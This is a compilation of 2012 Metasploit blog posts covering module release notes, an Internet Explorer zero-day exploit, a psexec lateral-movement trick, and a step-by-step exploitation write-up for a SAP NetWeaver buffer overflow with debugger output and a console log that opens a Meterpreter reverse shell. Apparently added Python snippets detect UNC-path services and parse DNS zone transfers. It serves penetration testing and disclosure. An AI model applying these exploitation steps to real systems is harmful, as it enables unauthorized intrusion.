Metasploit Blog, September 2012

In addition to the frankly killer 0-day in RateMyPet, we have a couple other things going on in Metasploit land.

 

Mac OSX 64-Bit Payloads

 

Probably the most significant add this week is Metasploit community contributor Nemo's two new 64-bit payloads for Mac OSX targets. While OSX isn't the most popular target on the block, we do have a steadily growing collection of exploits targeting Apple platforms, so bringing 64-Bit platforms into the fold of assessable targets is kind of a big deal. Thanks Nemo!

 

Fixing MSFUpdate After an Outage

 

DerbyCon is afoot, so naturally (let's say) it's time to update a pile of Metasploit's Ruby gem dependencies. Ruby gems include things like ActiveRecord, which allows the Framework to talk to the database backend, and Railties, which is an extension to Rails and handles parts of the Metasploit Community and Metasploit Pro interfaces. All told, this update has about 400,000 lines of source code change from the last update. About that...

 

Late last week, this gem update ended up causing some problems for users who a) track our development very closely while b) on slower links or c) overseas who d) use svn or msfupdate specifically to get their daily (or hourly) fix of Metasploit updates. This doesn't describe the typical Metasploit Community or Metasploit Pro users, who get updates on a weekly basis. This would have affected only the people who fit this particular profile.

 

It's not the total size difference that caused problems, mind you. This week's update is slightly smaller than last week's, as it turns out, due to these changes. The problem is that the way SVN tracks changes can cause msfupdate to bail out before it completes. This tracking is fine and normal for a source control system, but it's not all that great for a (relatively) simple software update system.

 

While Metasploit Pro users wouldn't have noticed anything wrong, some of our open source Framework folks would have noticed the problems starting late last week. If you have been msfupdating lately and not noticed anything, you're out of the woods.

 

I'm sorry about that. I'm so sorry, in fact, that I'm revisiting how msfupdate does its update thing. We'll be looking at better ways to pick up changes from the master branch in a reasonably quick way that doesn't drag along the entire history of Metasploit development with it, which was the crux of the problem.

 

The moral of the story is, we're treating this episode like a service outage. This week's update will get everyone past the 400KLOC change hump (updates like this effectively advance the pointer for you), and we'll test our new updating process on slow links so as not to run into this kind of problem again.

 

So, happy DerbyCon everyone, bring home some 0-day, and we'll be all set for next week.

 

New Modules

 

It's not all gem updates, of course. We have a smattering of new modules for you, too. For details and usage on these, just follow the links to our Exploit Database.

 

Exploit modules


 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Yo Dawg, I Heard You Like 0-Day

 

As you may have heard, on Monday we rolled out a special update to Metasploit to include the new Internet Explorer use-after-free exploit, aka, CVE-2012-4969. Last night, while scrolling through my RSS feed for security news, I saw this NetworkWorld story about how someone is using this vulnerability to install Poison Ivy, a RAT / backdoor. Of course, astute readers of this blog will know that Poison Ivy itself is vulnerable to a stack buffer overflow condition.

 

Let's think about this for a second. Internet criminals are using an unpatched IE vulnerability to deliver software which is controlled by software that also has an unpatched vulnerability.

 

So, if you happen across a vulnerable client during a penetration test, it would behoove you to check to see if anyone is connected to Poison Ivy's listening socket, TCP/3460. From there, you should be able to discover if any /other/ assets that are in scope for your test are already controlled. Exact details of how to accomplish that are left as an exercise for the reader. (:

 

By the way, if you haven't yet had a chance to test the Metasploit module for the Internet Explorer vulnerability, here's a video of Eric Romang taking it for a spin. Huge thanks again to Eric and @binjo for throwing in on all this. Getting the word out on these high-value bugs really does kill their usability for the bad guys.

 

New Modules

 

Of course, there's more in this update than just a refresh of the MSIE exploit. Egypt has a nice new local exploit for Linux's udev, discovered by kcope, which is pretty nifty. So, here's the list -- for details and usage, follow the links to our Exploit Database.

 

Exploit modules


 

Auxiliary modules

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Thanks to the many CISOs and security engineers who attended our recent webcast, in which I presented some practical advice on how to leverage Metasploit to conduct regular security reviews that address current attack vectors. While Metasploit is often used for penetration testing projects, this presentation focuses on leveraging Metasploit for ongoing security assessments that can be carried out by a small security team to reduce the risk of a data breach.

 

This webcast is now available for on-demand viewing.

 

What you'll learn in this webcast:

 

  • Recent attack trends and how they matter to your business
  • Automating penetration tests to prevent untargeted, automated attacks
  • Quick & easy ways to verify vulnerabilities reported by your vulnerability assessment program so you can focus your limited resources where they have the most impact
  • Conducting regular password audits that require minimal effort to set up and maintain
  • Running social engineering campaigns to measure security awareness in an enterprise

 

Audience questions answered in this webcast

 

 

View the Security Programs with Metasploit Webcast Now

We have some Metasploit freshness for you today: A new zero-day exploit for Internet Explorer 7, 8, and 9 on Windows XP, Vista and 7. Computers can get compromised simply by visiting a malicious website, which gives the attacker the same privileges as the current user. Since Microsoft has not released a patch for this vulnerability yet, Internet users are strongly advised to switch to other browsers, such as Chrome or Firefox, until a security update becomes available. The exploit had already been used by malicious attackers in the wild before it was published in Metasploit. The associated vulnerability puts about 41% of Internet users in North America and 32% world-wide at risk (source: StatCounter). We have added the zero-day exploit module to Metasploit to give the security community a way to test if their systems are vulnerable and to develop counter-measures.

 

Here's the back story: Some of you may remember that a couple of weeks ago, the Metasploit exploit team released a blog regarding a new Java exploit (CVE-2012-4681), with a blog entry titled "Let's Start the Week with a New Java 0day in Metasploit". You'd think the 0-day attack from the same malicious group might cool down a little after that incident... well, you'd be wrong. Because last weekend, our fellow researcher and Metasploit contributor Eric Romang just spotted another 0-day, possibly from the same group, exploiting a Microsoft Internet Explorer use-after-free vulnerability.

 

The Metasploit team has had the pleasure to work with Mr. Romang and @binjo together, and pretty soon we had a working exploit. You may download Metasploit here, and apply the latest update to pick up the exploit.

 

The following screenshot demonstrates a successful attack against a Windows 7 machine with Internet Explorer 9 installed:

 

[Screenshot]

 

This one is against Internet Explorer 8 installed:

 

[Screenshot]

 

Here's another example exploiting a fully-patched Windows XP SP3 box:

 

[Screenshot]

 

The exploit also works against Windows Vista, but I think you guys get the point now.

 

To try out this module, get your free Metasploit download now, or update your existing installation. In the meantime, we will keep this blog updated when more progress has been made.

 

Stupid PHP Tricks

 

This week's Metasploit update is a cautionary tale about running unaudited PHP applications as part of your infrastructure. Metasploit community contributor Brendan Coles has discovered and written Metasploit modules for two similar root-level vulnerabilities: one for OpenFiler and one for WAN Emulator (aka "WANem").

 

To be honest, I don't have anything personal against PHP. Some of my best friends are PHP guys. That said, these modules exploit some pretty serious flaws, and stuff like this crops up alarmingly often in PHP apps due to the forty zillion ways PHP allows the developer to expose command injection vulnerabilities. Taking this as a given for the language, running a binary as setuid root (as WANem does) or having your service account be in the wheel group (as OpenFiler does) is asking for trouble.

 

Part of the security agreement we have with open source software is a notion of basic auditability. Ostensibly, it's not just possible, but likely, that security bugs like these won't live long in open source software, due to the fact that the code is directly auditable. Now, I don't know how long these bugs actually lived out in the wild, but thanks to Brendan for fulfilling his end of this social contract. The take-away here is, if you are considering running open source software in your environment, I hope you take advantage of the openness and perform a cursory audit for red flag warning signs like these.

 

Keeping Targets Fresh

 

In addition to the new modules this week, we've also validated some new targets for the HP SiteScope getSiteScopeConfiguration and HP SiteScope loadFileContent ZDI exploits. When research time permits, we like to loop back over recent disclosures like these to see if we can't validate more targets than the original exploit covered, so this kind of updating is pretty common. However, we don't have infinite time and bandwidth, so if you happen to notice that one of Metasploit's shipping modules works against a target that wasn't mentioned in the description, let us know! A GitHub pull request with a description update and some kind of validation like a screen capture or pcap dump is an ideal method to alert us to more targets, but e-mail, IRC, bug reports, or SecurityStreet posts will get our attention, too.

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Exploit modules

 

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

egypt

Current User psexec

Posted by egypt Employee Sep 12, 2012

At DEF CON this year I talked about some of the post exploitation capabilities within Metasploit and demo'd a cool technique I developed with Jabra on a pentest a year or so ago (I later found out that Mubix had come up with basically the same idea - great minds think alike). It is essentially this: use a session's current token to create a remote service on a victim machine.

 

It takes advantage of a feature in Windows that most people take completely for granted. Given that you are already logged in to your desktop machine, you can browse around on shares as yourself transparently due to Windows' security token mechanism. This extends to more than just file shares, and to more than just console logins. If your user has Local Administrator access on the target machine, you can also fiddle with the registry and start/stop services, all without knowing a password or hash. Anyone familiar with how psexec works will notice the awesomesauce here.

 

When doing a normal psexec, Metasploit uploads an exe to the remote system and uses that as the service executable. It turns out the Windows API allows UNC paths for service executables, and since we already control a system on the network, we can reduce the forensic footprint on the network overall by just uploading it to the compromised machine. Then we start up a file share and set all the victims to use a UNC path to that share, resulting in only one filesystem containing the actual executable file, and only for as long as you're running the module. Here's the module in action:

 

I'll be talking about more of the local exploitation capabilities in Metasploit at Derbycon, I hope to see you there.
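A defender's check for the UNC-path service trick described in this post, as an added example (not the Metasploit module's own code): Windows records every new service in the System log as Event ID 7045 with its ImagePath, and a service binary on a UNC path, especially the same share showing up on several hosts, is the footprint this technique leaves. The event records, hostnames and share names below are constructed for the example.

```python
import re

# A UNC path: two backslashes, a host, a backslash, then share\path. The path
# may be quoted or buried in launcher arguments (%COMSPEC% /c \\host\share\x),
# so the pattern is searched anywhere in the ImagePath, not just at its start.
UNC_RE = re.compile(r'\\\\([^\\\s"]+)\\([^\s"]+)')

# Constructed Event ID 7045 records ("A service was installed in the system").
SAMPLE_7045_EVENTS = [
    {"Computer": "WS01", "ServiceName": "Netlogon",
     "ImagePath": r"C:\Windows\system32\lsass.exe"},
    {"Computer": "WS02", "ServiceName": "xKqTmZ",
     "ImagePath": r"\\10.0.0.23\share\xKqTmZ.exe"},
    {"Computer": "WS03", "ServiceName": "psexesvc",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"Computer": "WS04", "ServiceName": "Updater",
     "ImagePath": r'"\\fileserv\tools$\svc.exe" -run'},
    {"Computer": "WS05", "ServiceName": "cmdsvc",
     "ImagePath": r"%COMSPEC% /c \\10.0.0.23\share\run.bat"},
]


def find_unc_paths(image_path):
    """Return (host, share_and_file) pairs for every UNC path in an ImagePath."""
    return [(m.group(1), m.group(2)) for m in UNC_RE.finditer(image_path)]


def flag_unc_service_installs(events):
    """Keep the 7045 records whose service binary is served from a UNC path.

    A normal psexec drops a local file (the PSEXESVC case above is not flagged
    here); the UNC variant leaves no file on the victim, so the service
    registration is the main host-side artifact to look for.
    """
    flagged = []
    for ev in events:
        hits = find_unc_paths(ev["ImagePath"])
        if not hits:
            continue
        host, _ = hits[0]
        flagged.append({"Computer": ev["Computer"],
                        "ServiceName": ev["ServiceName"],
                        "UncHost": host,
                        "ImagePath": ev["ImagePath"]})
    return flagged


def summarize_unc_hosts(flagged):
    """Group flagged installs by the host serving the binary.

    One share referenced by services on many machines is exactly the pattern
    the technique produces (a single filesystem holding the executable).
    """
    by_host = {}
    for f in flagged:
        by_host.setdefault(f["UncHost"], []).append(f["Computer"])
    return {h: sorted(c) for h, c in sorted(by_host.items())}


if __name__ == "__main__":
    hits = flag_unc_service_installs(SAMPLE_7045_EVENTS)
    for h in hits:
        print(f'{h["Computer"]}: service {h["ServiceName"]} -> {h["ImagePath"]}')
    for host, computers in summarize_unc_hosts(hits).items():
        print(f"{host} serves service binaries to {len(computers)} host(s): {computers}")
```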

Zone Transfers for All

 

This week, Metasploit community contributor bonsaiviking fixed up the DNS library that Metasploit uses so we won't choke on some types of zone transfer responses. Turns out this is a two-year-old bug, but DNS servers that actually offer zone transfers are so rare anymore that this bug didn't manifest enough to get squashed.

 

This brings me to a larger point -- with older vulnerabilities like these, sometimes the hardest part for us is reproducing the bug in the first place. With old software, for example, it's sometimes really hard to get a hold of the vulnerable version. With this module, the problem is that it's a pain to go and configure DNS in a vulnerable way.

 

In this case, though, we were able to test using Robin Wood's most useful ZoneTransfer.me service, which is exactly what you think it might be. It's a live DNS server, out on the Internet, with zone transfers enabled. This allows researchers, trainers, and vulnerability archeologists to become familiar with an antique vulnerability that they may still run into in the real world from time to time. This kind of intentionally vulnerable offering is invaluable, so thanks not only to bonsaiviking for finally nailing down this fix, but also to Robin for making the fix easy to test.

 

For all the gritty details, see Pull Request #698 on Metasploit's GitHub site.
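The kind of response a zone transfer client has to cope with, as an added example (this is not Metasploit's DNS library or the change in Pull Request #698, and I am assuming that a transfer split across several TCP messages is the response type the post refers to): a minimal AXFR-over-TCP parser run against a constructed three-message transfer, a REFUSED answer from a server that does not allow transfers, and a truncated stream. The zone name, addresses and serial are constructed.

```python
import struct

# RR types used below; 252 is the AXFR query type.
TYPE_A, TYPE_NS, TYPE_SOA, QTYPE_AXFR = 1, 2, 6, 252
ZONE = "example.test."  # constructed zone, not a real domain


def encode_name(name):
    """Wire-encode a dotted name as length-prefixed labels."""
    out = b"".join(bytes([len(lab)]) + lab.encode()
                   for lab in name.strip(".").split("."))
    return out + b"\x00"


def rr(name, rtype, rdata, ttl=3600):
    """Build one resource record (class IN)."""
    return encode_name(name) + struct.pack(">HHIH", rtype, 1, ttl, len(rdata)) + rdata


def message(msg_id, answers, rcode=0):
    """Build one length-prefixed (TCP framing) AXFR response message."""
    flags = 0x8400 | rcode  # QR + AA, plus the response code
    body = struct.pack(">HHHHHH", msg_id, flags, 1, len(answers), 0, 0)
    body += encode_name(ZONE) + struct.pack(">HH", QTYPE_AXFR, 1)
    body += b"".join(answers)
    return struct.pack(">H", len(body)) + body


SOA_RDATA = (encode_name("ns1." + ZONE) + encode_name("hostmaster." + ZONE)
             + struct.pack(">IIIII", 2012090101, 7200, 3600, 1209600, 3600))


def build_multi_message_axfr():
    """Constructed transfer split over three TCP messages: SOA ... SOA."""
    soa = rr(ZONE, TYPE_SOA, SOA_RDATA)
    return (message(0x1234, [soa, rr(ZONE, TYPE_NS, encode_name("ns1." + ZONE))])
            + message(0x1234, [rr("ns1." + ZONE, TYPE_A, bytes([192, 0, 2, 53])),
                               rr("www." + ZONE, TYPE_A, bytes([192, 0, 2, 80]))])
            + message(0x1234, [soa]))


def build_refused_axfr():
    """What a correctly restricted server answers: REFUSED, no records."""
    return message(0x1234, [], rcode=5)


def read_name(buf, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end = [], None
    while True:
        length = buf[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 4.1.4)
            if end is None:
                end = off + 2
            off = struct.unpack(">H", buf[off:off + 2])[0] & 0x3FFF
            continue
        labels.append(buf[off + 1:off + 1 + length].decode())
        off += 1 + length
    return ".".join(labels) + ".", (off if end is None else end)


def parse_message(msg):
    """Return (rcode, [(name, type, rdata)]) for one DNS message."""
    _, flags, qd, an, _, _ = struct.unpack(">HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):  # skip the question section
        _, off = read_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        records.append((name, rtype, msg[off:off + rdlen]))
        off += rdlen
    return flags & 0xF, records


def parse_axfr_stream(stream):
    """Consume a TCP byte stream of AXFR responses; return (records, complete).

    The zone is complete only when the SOA has been seen twice (first and last
    record), which may take several messages; stopping after the first message
    is the mistake that makes a client choke on split transfers.
    """
    records, soa_count, off = [], 0, 0
    while off + 2 <= len(stream) and soa_count < 2:
        (mlen,) = struct.unpack(">H", stream[off:off + 2])
        msg = stream[off + 2:off + 2 + mlen]
        if len(msg) < mlen:
            break  # truncated: the rest has not arrived yet
        off += 2 + mlen
        rcode, recs = parse_message(msg)
        if rcode != 0:
            return records, False  # e.g. REFUSED: transfers not permitted
        for rec in recs:
            records.append(rec)
            if rec[1] == TYPE_SOA:
                soa_count += 1
            if soa_count == 2:
                break
    return records, soa_count == 2
```

A server that answers a live AXFR with the full zone, as ZoneTransfer.me deliberately does, is exposing its whole record set; the REFUSED case is what your own authoritative servers should return to unauthorised clients.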

 

Exploiting SAP NetWeaver

 

Also in this week's update are two new SAP NetWeaver exploits, both implemented by our own Juan Vazquez, based on the research work from Michael Jordan and Martin Gallo. Juan has another blog post up that dives into the details on how he exploits CVE-2012-2611, complete with screenshots and insightful commentary on the squirrelly nature of Unicode detection. If you're a fan of Juan's step-by-step war stories of exploit development, you will definitely want to check the module and blog post.

 

Microsoft SQL Server Tricks

 

So you've gained control of a Microsoft SQL Server database -- now what? Community contributor Scott "nullbind" Sutherland has two new MSSQL modules in this week's update. The first is the exceedingly handy Find and Sample Data module, which can quickly paw through a database for named keywords -- things like "CC#" or "ccval" or "password," or other likely places to find sensitive data that PCI auditors love to get a hold of. The second is a local authentication bypass, which makes it easy and fun to use an existing Meterpreter session to add an sa-level account to the target database.

 

Database hacking holds a special place in my heart, so I love to see these kinds of auxiliary and post modules come in from the community. Thanks for those!

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Exploit modules

 

Auxiliary modules

 

Post modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

In this blog post we would like to share some details about the SAP NetWeaver exploit for CVE-2012-2611, which we've recently added to Metasploit. This module exploits an unauthenticated buffer overflow, discovered by Martin Gallo, in the DiagTraceR3Info() function, reachable when tracing is enabled on SAP NetWeaver. It captured our attention due to the well-documented technical details and the publicly available tools for triggering the vulnerability.

 

First of all, in order to understand the exploitation of this DiagTraceR3Info buffer overflow, the important points about the vulnerable function are explained below:

 

(1) The vulnerable function is protected by stack cookies:

 

[Figure: TraceInfo_1.png]

 

(2) The overflow is caused by a copy loop that copies user-controlled data into a fixed-size buffer on the stack. Understanding this loop is important for exploitation, especially:

  • Before starting the loop, the first word (2 bytes) of data is used to decide whether it must be converted to Unicode while copying. If the first word is detected as Unicode, the data is just copied word by word, without conversion. This is quite interesting, because it allows us to overflow the stack with our own fully controlled data!
  • A pointer to the user-controlled data (the message data) is stored in EBX, and the reference is still available after the copy loop.
  • To fully understand the copying routine, I leave you the following reversing notes:

 

[Figure: TraceInfo_2.png]

 

(3) After the overflowing loop, the function tries to recover a reference to GetBytesPerChar() from an object stored on the stack. Since the data on the stack has been overwritten, this allows us to take control of EIP before the stack cookie check:

 

[Figure: TraceInfo_3.png]

 

(4) When the code tries to call the GetBytesPerChar() function, EBX is still pointing to the start of the (user-controlled) message data:

 

0:000> db ebx
099a0056  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0066  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0076  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0086  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0096  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00a6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00b6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00c6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

 

With this in mind, on Windows XP SP3 with DEP OptIn, reliable code execution can be achieved just by using a "call ebx". Fortunately, Unicode-compatible pointers to "call ebx" exist in the "disp+work.exe" image (the SAP dispatcher executable), so the conversion to Unicode during the copy loop is of no concern to us:

 

0:000> u 0x005f007a L1
disp_work!ThVBReadStat+0x23fa [d:\depot\bas\720_rel\src\optu\ntintel\krn\thrun\thxxvb.c @ 11371]:
005f007a ffd3            call    ebx

 

On Windows 2003 SP2 with DEP OptOut, DEP will be enabled for the Dispatcher service and the solution is not so easy. If the message data is converted to Unicode during the copy loop, some options to achieve execution could be:

 

  • Stack pivot to the contents pointed to by EBX, or find a way to do a "mov esp, ebx" with Unicode pointers.
  • On the stack, a reference to the user-controlled message data (without conversion, all right) can be found at ESP+20:

 

0:000> dd esp + 20 L1
063e9d9c  099a0056
0:000> db poi(esp+20)
099a0056  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0066  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0076  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0086  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0096  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00a6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00b6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00c6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

 

So a stack pivot to the contents pointed to by [ESP+20], or finding a way to do a "mov esp, [esp+0x20]" with Unicode pointers, would be another solution.

  • Have a Unicode compliant ROP chain.

 

Unfortunately, after some tries, we weren't able to achieve DEP bypass with any of the above options. Because of this, it's important to avoid Unicode conversion during the copy loop in order to achieve DEP bypass. With the loop analysis presented before in mind, injecting a null byte in the first word of the TraceInfo message allows us to overflow while avoiding Unicode conversion, using fully user-controlled data, overwrite the GetBytesPerChar() function pointer stored on the stack, and use the well-known ROP chain from msvcrt.dll to achieve DEP bypass on Windows 2003 SP2. And here is the final result:

 



       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 948 exploits - 503 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops


msf  exploit(sap_netweaver_dispatcher) > use exploit/windows/misc/sap_netweaver_dispatcher 
msf  exploit(sap_netweaver_dispatcher) > set RHOST 192.168.1.149
RHOST => 192.168.1.149
msf  exploit(sap_netweaver_dispatcher) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.149:3200 - Sending initialize packet to the SAP Dispatcher
[*] 192.168.1.149:3200 - Sending crafted message
[*] Sending stage (764928 bytes) to 192.168.1.149
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.149:1201) at 2012-09-03 00:10:20 +0200

meterpreter > 
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.149:1201) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: disp+work.EXE (2732)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2012
[+] Successfully migrated to process 

meterpreter > sysinfo
Computer        : MSFSAP2003
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: MSFSAP2003\SAPServiceNSP
meterpreter > 

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.

Exploit Database (DB)

Coming from August's Java 0-day release, there are three new Java exploits among the top 10 most searched Metasploit exploits and auxiliary modules in this month's trend list. The monthly statistics are drawn from our exploit database by analyzing webserver logs of searches on metasploit.com, not through Metasploit usage, which is not tracked for privacy reasons.

 

Check out the top searched exploits and modules below, annotated with Tod Beardsley's excellent comments:

 

  1. Java 7 Applet Remote Code Execution: Of course, this is the reason why all the other Java modules leapt up in the rankings, in case you've been on safari for the last several weeks and haven't heard the story yet. Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshaw. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. New entry this month.

  2. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Down one place from #1 last month.

  3. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down one place from #2 last month.

  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Same position as last month.

  5. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic at Microsoft’s Security TechCenter. Down 2 places from #3 last month.

  6. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #10, I’d bet it’s the most-used module in classroom and test environments. More on this topic in the National Vulnerability Database. Up two places from #7 since last month.

  7. Java Signed Applet Social Engineering Code Execution: Like the Adobe PDF Embedded EXE Social Engineering module, this is a really solid go-to module for social engineering payloads. A simple Google search turns up dozens of demonstration videos from all around the world on how to use this module. Up one place from #8 since last month.

  8. PHP CGI Argument Injection: This exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installations, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. More info on this on a blog at Serge Security. Up one place from #9 since last month.

  9. Java Applet Rhino Script Engine Remote Code Execution: This module from late November of 2011 used to be the go-to Java exploit for browser targets - of course, that all changed with the new Java 0-day we released this month. This module most likely jumped up the rankings as everyone and their brother pawed through the Metasploit Exploit DB for all things Java. We got a ton of coverage on the Java 0-day event, so that aura certainly skewed the numbers for this module, even when it was already pretty popular. New entry since last month.

  10. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module. More on this topic at the National Vulnerability Database. Same position as last month.

 

If you want to use any of these exploits right now, you can download Metasploit for free!
